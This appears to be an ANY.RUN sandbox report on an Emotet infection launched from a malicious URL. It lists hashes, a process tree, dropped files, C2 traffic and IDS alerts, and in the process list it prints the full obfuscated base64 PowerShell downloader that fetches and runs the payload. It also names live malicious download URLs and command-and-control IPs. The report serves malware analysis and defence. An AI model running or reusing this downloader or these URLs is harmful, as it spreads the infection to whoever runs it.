analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://eztravel.jp/wp-includes/4s5t4-7ov7wm0-cqhiuim/

Full analysis: https://app.any.run/tasks/730fb00d-00ab-44e9-afdb-c013e7bc1711
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: April 23, 2019, 11:15:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet
emotet-doc
Indicators:
MD5:

6E71012CF4B43BA3960267F7621C91A2

SHA1:

1DAAC29213D9593D508A68D7EB1AECC79A0D5D15

SHA256:

0D08BCA5111ACEBF502D292A2D8BFF70FA1E634BD726BD5DC2FB114273503960

SSDEEP:

3:N1KbKogELGe2lRXuqt:Cryf9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 233.exe (PID: 1796)
      • 233.exe (PID: 3524)
      • soundser.exe (PID: 128)
      • soundser.exe (PID: 4008)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 3312)

    • Emotet process was detected

      • soundser.exe (PID: 4008)

  • SUSPICIOUS

    • Starts Microsoft Office Application

      • iexplore.exe (PID: 308)
      • WINWORD.EXE (PID: 728)

    • Application launched itself

      • WINWORD.EXE (PID: 728)
      • 233.exe (PID: 3524)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3312)
      • 233.exe (PID: 1796)

    • Creates files in the user directory

      • powershell.exe (PID: 3312)

    • Starts itself from another location

      • 233.exe (PID: 1796)

    • Connects to server without host name

      • soundser.exe (PID: 128)

  • INFO

    • Creates files in the user directory

      • iexplore.exe (PID: 308)
      • iexplore.exe (PID: 1520)
      • WINWORD.EXE (PID: 728)

    • Application launched itself

      • iexplore.exe (PID: 308)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 1520)

    • Changes internet zones settings

      • iexplore.exe (PID: 308)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 768)
      • WINWORD.EXE (PID: 728)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
9
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start iexplore.exe iexplore.exe winword.exe no specs winword.exe no specs powershell.exe 233.exe no specs 233.exe #EMOTET soundser.exe no specs soundser.exe

Process information

PID
CMD
Path
Indicators
Parent process
308"C:\Program Files\Internet Explorer\iexplore.exe" http://eztravel.jp/wp-includes/4s5t4-7ov7wm0-cqhiuim/C:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1520"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:308 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
728"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\IWEDY0QX\6730928576DE_April_23_2019[1].doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
768"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3312powershell -e JAByAEEAMQAxAG8ARABVAD0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACcAUgBYACcALAAnAFoAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBCAEEAUQAnACwAJwBYACcAKQApADsAJABzADEAUQAxAFUAbwAgAD0AIAAnADIAMwAzACcAOwAkAEUAQQBBADQAQQB4AHcAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcARABRACcALAAnAFoAQQBYACcALAAnAFEAJwApADsAJABpAEEAXwBHAEEAawBrAGMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHMAMQBRADEAVQBvACsAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwB4AGUAJwAsACcALgBlACcAKQA7ACQAUwAxAG8AawBjAEQARwA9ACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAFcAQQBBACcALAAnAFEAJwApACwAJwBEACcALAAnAEEAQQBEACcAKQA7ACQASwBaAEQAQQBYAEEAQgA9AC4AKAAnAG4AJwArACcAZQB3AC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBFAGAAVABgAC4AVwBlAEIAQwBMAGkAYABlAG4AdAA7ACQAegBRAF8AVQBBAEEAQwB3AD0AKAAiAHsANAB9AHsANgB9AHsAMwB9AHsAMgA4AH0AewAyADIAfQB7ADEANwB9AHsAMQAyAH0AewAyADUAfQB7ADEANAB9AHsAMgAzAH0AewA4AH0AewA5AH0AewA1AH0AewAxADUAfQB7ADIANAB9AHsAMQA4AH0AewAyADAAfQB7ADIANwB9AHsAMQAxAH0AewAwAH0AewAxAH0AewAyADEAfQB7ADEAOQB9AHsAMgA5AH0AewAyADYAfQB7ADEANgB9AHsAMQAwAH0AewAyAH0AewA3AH0AewAxADMAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBtAGEAJwAsACcAdQBpACcAKQAsACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwB3ACcALAAnAG0ALwAnACwAJwBwAC0AYQAnACkALAAnAG4AdAAuACcALAAnAGMAbwAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAGwALwB3ACcALAAnAG4AJwApACwAJwBwACcAKQAsACcAaQBuACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAcAA6ACcALAAnAGgAdAAnACkALAAnAHAAJwAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwAvAC8AJwAsACcAbQB1AGwAJwApACwAJwB0AGkAJwAsACcAdAAnACwAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwByACcALAAnAGEAJwAsACcAZABlAHAAbwAnACkAKQAsACcALQBhACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwAuACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAbgAuAG8AcgAnACwAJwBnACcAKQApACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBuAGcALwAnACwAJwB3ACcAKQAsACcALgAnACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwAvAC8AZwAnACwAJwB0AHAAOgAnACwAJwBAAGgAdAAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAdAAnACwAJwB0AHAAOgAnACkALAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACcALwBsAFoAXwAnACwAJwBlADEAJwAsACcAbgAnACkALAAnAC8AJwAsACcAZABtAGkAJwApACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAG0AYQBzACcALAAnAC8AJwApACwAJwBwACcAKQAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBvAG4AJwAsACcALQBjACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAZQBuAHQAJwAsACcALwB1ACcAKQAsACcAdAAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAHMAbwBtACcALAAnAGUAJwApACwAJwBAAGgAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAYwAnACwAJwBsAC4AaQAnACwAJwBlAGwAJwApACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwB0ACcALAAnADoALwAvACcALAAnAHQAcAAnACkALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwAvACcALAAnAHcAcAAtACcAKQAsACcAZAAnACkALAAoACIAewAzAH0AewAwAH0AewAyAH0AewAxAH0AewA0AH0AIgAtAGYAJwBpAG4AJwAsACcAXwB4ADgAJwAsACcALwBjACcALAAnAGQAbQAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwAvAEAAaAAnACwAJwB0ACcAKQApACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBuAHQAJwAsACcAYwBvAG4AdABlACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAcQAvACcALAAnAF8AZwAnACkALAAnAC8ANgAnACkALAAnAGEAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcALwBAACcALAAnAF8AQQAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAC8ALwAnACwAJwBmAHIAZQAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAGgAdAB0AHAAJwAsACcAOgAnACkALAAnAGUAJwApACwAJwAvACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBkACcALAAnAGEAbABvAG4AaABhAG4AJwApACwAJwBzACcAKQAsACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACcAXwBmACcALAAnAGkAbgBjACcALAAnAC8AJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBsAHUAZAAnACwAJwBlAHMALwBnACcAKQApACwAKAAiAHsAMAB9AHsAMwB9AHsAMQB9AHsAMgB9ACIALQBmACcAdAAuACcALAAnAHAAJwAsACcALQAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBjAG8AJwAsACcAbQAvAHcAJwApACkALAAnAHIAaQBtACcAKQAuACIAUwBgAFAATABJAHQAIgAoACcAQAAnACkAOwAkAGQAQQBBADEAQQAxAFEAPQAoACIAewAxAH0AewAwAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAQQAnACwAJwAxAHcARAAnACkALAAnAEEAJwApACwAJwByAEEAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAZgBBAG8AQQBvAGMAVQAgAGkAbgAgACQAegBRAF8AVQBBAEEAQwB3ACkAewB0AHIAeQB7ACQASwBaAEQAQQBYAEEAQgAuACIARABPAFcATgBsAG8AQQBgAGQAZgBJAGAATABFACIAKAAkAGYAQQBvAEEAbwBjAFUALAAgACQAaQBBAF8ARwBBAGsAawBjACkAOwAkAEYAQQA0AEIAXwBCAEQAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBrACcALAAnAFUAdwBEACcAKQAsACcANAAnACwAJwBDAHgAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAGkAQQBfAEcAQQBrAGsAYwApAC4AIgBMAGUATgBgAGcAdABIACIAIAAtAGcAZQAgADMAMgA5ADkAOQApACAAewAuACgAJwBJAG4AdgBvAGsAZQAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABpAEEAXwBHAEEAawBrAGMAOwAkAE0AQgBBADQAYwBDAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAQQAnACwAJwBCAEcAQgAnACkALAAnAHQAJwApADsAYgByAGUAYQBrADsAJAB0AGMAYwBCAFUAQgAxAD0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIAIAAtAGYAJwA0ACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAVQBEACcALAAnAFgAQQBaACcAKQAsACcAQQAnACkALAAnAHcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABjAEcAawA0AEEAVQBfAHcAPQAoACIAewAxAH0AewAwAH0AIgAtAGYAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAGsAJwAsACcARABBAEcAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAWABrACcALAAnAEgAQgAnACkAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3524"C:\Users\admin\233.exe" C:\Users\admin\233.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1796--640a0d70C:\Users\admin\233.exe
233.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
4008"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
233.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
128--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Integrity Level:
MEDIUM
Total events
2 928
Read events
2 391
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
6
Text files
12
Unknown types
8

Dropped files

PID
Process
Filename
Type
308iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
MD5:
SHA256:
308iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
308iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFA31D6DEAB13F41E8.TMP
MD5:
SHA256:
728WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRAD72.tmp.cvr
MD5:
SHA256:
728WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_B26FA021-49A5-4342-8BAD-E930DC55149E.0\833ABB53.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
1520iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@eztravel[1].txttext
MD5:35B5DE5B347BDFBFBCF0D065B8795B05
SHA256:20E950DA40A139E7F60246A2C3FBF022146C6CF7685C7E5F74A5BC9A4F075A16
1520iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\IWEDY0QX\6730928576DE_April_23_2019[1].docdocument
MD5:E47CE2635410519EFC5831DC48DEF514
SHA256:7169323BD6C9EE7C407E5B654BDBCCC85ADFEAD85E80ED65F147F79DA7E7004C
728WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\IWEDY0QX\~$30928576DE_April_23_2019[1].docpgc
MD5:79F365B36255B16107578184C4DE949B
SHA256:525C35DC6F8E5680A79F1933BBE8205A0F9827D936434619931B8100B4CA1531
308iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFCE20FC55247AD3D1.TMP
MD5:
SHA256:
1520iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.datdat
MD5:977FBF0F6C3715A19B46F4413B2CA0E1
SHA256:E8E5BF6FDEC01787DFB779A23B4641AF1B65220CF0E00101E18794842EE16A58
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
128
soundser.exe
POST
68.229.130.39:80
http://68.229.130.39/schema/
US
malicious
3312
powershell.exe
GET
200
149.255.62.85:80
http://multitradepoint.com/wp-content/6_gq/
GB
executable
77.5 Kb
suspicious
1520
iexplore.exe
GET
200
43.240.28.157:80
http://eztravel.jp/wp-includes/4s5t4-7ov7wm0-cqhiuim/
HK
document
118 Kb
suspicious
308
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1520
iexplore.exe
43.240.28.157:80
eztravel.jp
SonderCloud Limited
HK
suspicious
308
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3312
powershell.exe
149.255.62.85:80
multitradepoint.com
Awareness Software Limited
GB
suspicious
128
soundser.exe
68.229.130.39:80
Cox Communications Inc.
US
malicious

DNS requests

Domain
IP
Reputation
eztravel.jp
  • 43.240.28.157
suspicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
multitradepoint.com
  • 149.255.62.85
suspicious

Threats

PID
Process
Class
Message
1520
iexplore.exe
Potentially Bad Traffic
ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)
1520
iexplore.exe
Misc activity
SUSPICIOUS [PTsecurity] Download DOC file with VBAScript
1520
iexplore.exe
Potential Corporate Privacy Violation
ET POLICY Office Document Download Containing AutoOpen Macro
3312
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3312
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3312
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
http://eztravel.jp/wp-includes/4s5t4-7ov7wm0-cqhiuim/